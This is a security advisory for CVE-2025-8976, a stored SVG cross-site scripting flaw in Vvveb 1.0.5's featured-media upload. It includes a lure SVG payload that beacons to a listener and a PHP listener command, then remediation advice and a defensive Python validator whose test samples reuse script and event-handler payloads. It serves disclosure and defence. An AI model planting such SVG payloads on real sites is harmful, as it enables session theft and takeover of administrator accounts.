Vvveb - v1.0.5 - Cross-Site Scripting via SVG

By 0xhamy 05:02 PM - October 22nd 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor givanz
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Cross-Site Scripting
Severity High
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score 8.7
CVE ID CVE-2025-8976
Vendor Acknowledgement Yes
Affected digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Credit 0xhamy

Description

Vvveb 1.0.5 is vulnerable to authenticated stored XSS via the Featured Media upload on posts and pages.
A user with editor rights can upload a crafted SVG as the featured image. While the file is embedded through an <img> tag the browser treats it as an inert image, but when a viewer opens it directly (e.g., right-click → Open image in new tab) the browser renders it as a top-level document under the site’s origin, so script, event handlers and external references inside the SVG run there. This enables session theft and privileged actions against other authenticated users (including admins/super admins), which is why the vector carries PR:L and UI:R with a changed scope.

Vulnerability Details

The post/page editors at:

  • /vadmin123/index.php?module=content/post&type=post
  • /vadmin123/index.php?module=content/post&type=page

accept SVG as “Featured Media” without adequate sanitization. SVG is XML, and a browser that loads an SVG file as a top-level document (e.g., right-click → Open image in new tab) gives it a full DOM and script engine, so attacker-controlled content (<script> elements, on* event handlers, external references such as <image href="http://...">) executes in the origin that served the file. The same file shown via <img> is rendered without script or external fetches, which is why the lure text in the PoC asks the viewer to open the image in a new tab.
The result is a stored payload that any authenticated user who views the post or page (editor/admin) can inadvertently trigger, allowing cookie/session exfiltration and authenticated actions via the victim’s session.


Steps to Reproduce

  1. List or open posts/pages.

    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=post
    http://127.0.0.1/vadmin123/index.php?module=content/posts&type=page
    
  2. Edit a specific item.

    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=6&type=post
    http://127.0.0.1/vadmin123/index.php?module=content/post&post_id=14&type=page
    
  3. Upload a malicious SVG as “Featured Media.”
    Example (creates an SVG that lures users to open it and beacons to an attacker server):

    echo '<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
      <rect width="300" height="300" fill="red"/>
      <text x="150" y="250" font-size="12" fill="white" text-anchor="middle" alignment-baseline="middle">
        Please open the image in a new tab to see it
      </text>
      <image href="http://127.0.0.1:1718/capture.php" width="300" height="200"/>
    </svg>' > payload.svg
    

    Upload payload.svg as the featured image and save the post/page.

  4. Trigger the payload.
    Open the image by its full path (or right-click → Open image in new tab):

    http://127.0.0.1/media/payload.svg
    

    Observe the outbound request to:

    http://127.0.0.1:1718/capture.php
    
  5. (Optional) Listener setup.
    Use the capture.php listener from the PoC gist linked above and serve it with PHP’s built-in server on the port the SVG references:

    php -S 0.0.0.0:1718
    

    Confirm that the listener logs an incoming request for /capture.php each time the SVG is opened as a document (and not when the post editor merely displays it as an <img>).


Recommendation

  • Disallow SVG uploads for featured media, or sanitize them server-side before storage: reject or strip <script>, <foreignObject>, on* event handlers, external href/xlink:href references and CSS url()/@import, or convert the upload to a raster image.
  • Serve uploaded media with strict headers: a Content-Security-Policy on the media response that denies script and external loads (e.g., default-src 'none'; style-src 'unsafe-inline'; sandbox), X-Content-Type-Options: nosniff, and Content-Disposition: attachment for any SVG so that a direct open downloads the file instead of rendering it.
  • Validate file types server-side by content (not just extension or client-supplied MIME type) and restrict featured images to safe raster formats (PNG/JPEG/WebP).
  • Serve user uploads from a separate origin (e.g., a dedicated media domain) so that any script that does execute runs outside the application origin and cannot read its cookies or DOM.
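The following is an added example of the server-side check described in the first recommendation; it is not Vvveb’s code. It parses a candidate upload as XML and rejects it if it contains anything that could execute or phone home when the file is opened as a top-level document: DTD/entity declarations, xml-stylesheet instructions, <script>/<foreignObject>/<object>/<embed>/<iframe>, on* event handlers, href or xlink:href values other than same-document fragments or raster data URIs, and url()/@import in CSS. The sample SVGs (including a copy of the PoC’s beaconing payload) are constructed for the example. It uses only the standard library; in production prefer defusedxml for the parsing step.

```python
"""Allow-list validator for SVG uploads (example code, not Vvveb's own)."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that can run script or embed arbitrary HTML once the SVG is
# rendered as a document rather than as an <img>.
FORBIDDEN_TAGS = {"script", "foreignobject", "iframe", "object", "embed"}
# Attribute names (plain and xlink-namespaced) that carry a URL.
URL_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
# The only non-fragment references we accept: inline raster data URIs.
SAFE_DATA_URI = re.compile(
    r"^data:image/(png|jpe?g|gif|webp);base64,[A-Za-z0-9+/=\s]*$", re.I)
# CSS constructs that fetch remote resources.
CSS_EXTERNAL = re.compile(r"url\s*\(|@import", re.I)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags/attributes."""
    return name.rsplit("}", 1)[-1].lower()


def _url_ok(value: str) -> bool:
    v = value.strip()
    return v.startswith("#") or bool(SAFE_DATA_URI.match(v))


def validate_svg(data: bytes) -> tuple[bool, list[str]]:
    """Return (accepted, reasons); reasons is empty when the file is accepted."""
    reasons: list[str] = []
    low = data.decode("utf-8", errors="replace").lower()
    # Refuse DTDs and stylesheet PIs before parsing: entity expansion can DoS
    # the parser and xml-stylesheet can pull a remote stylesheet.
    if "<!doctype" in low or "<!entity" in low:
        reasons.append("DTD/entity declaration")
    if "<?xml-stylesheet" in low:
        reasons.append("xml-stylesheet processing instruction")
    if reasons:
        return False, reasons
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return False, [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return False, ["root element is not <svg>"]
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_TAGS:
            reasons.append(f"forbidden element <{tag}>")
        if tag == "style" and el.text and CSS_EXTERNAL.search(el.text):
            reasons.append("external reference in <style>")
        for name, value in el.attrib.items():
            lname = _local(name)
            if lname.startswith("on"):
                reasons.append(f"event handler {lname} on <{tag}>")
            elif name in URL_ATTRS and not _url_ok(value):
                reasons.append(f"external/unsafe reference on <{tag}>: {value[:60]}")
            elif lname == "style" and CSS_EXTERNAL.search(value):
                reasons.append(f"external reference in style attribute on <{tag}>")
    return not reasons, reasons


# Constructed samples: the PoC's beaconing payload, a <script> variant,
# an event-handler variant, and a benign icon that must pass.
BEACON_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="300" height="300">
  <rect width="300" height="300" fill="red"/>
  <image href="http://127.0.0.1:1718/capture.php" width="300" height="200"/>
</svg>"""
SCRIPT_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"><script>alert(document.domain)</script></svg>"""
HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="1" height="1"/></svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 10 10">
  <defs><circle id="dot" r="2"/></defs>
  <use xlink:href="#dot" x="5" y="5" fill="blue"/>
</svg>"""

if __name__ == "__main__":
    for label, blob in [("beacon", BEACON_SVG), ("script", SCRIPT_SVG),
                        ("handler", HANDLER_SVG), ("benign", BENIGN_SVG)]:
        ok, why = validate_svg(blob)
        print(f"{label}: {'accept' if ok else 'reject'} {why}")
```

Run the validator on the raw upload before it is written under /media/; a rejection is a reason to refuse the upload, not to attempt a repair, since an allow-list check is easier to reason about than stripping and re-serializing attacker-controlled XML. Even with the check in place, keep the response-header hardening above, because a future SVG feature or a parser mismatch between the validator and the browser is exactly what such filters tend to miss.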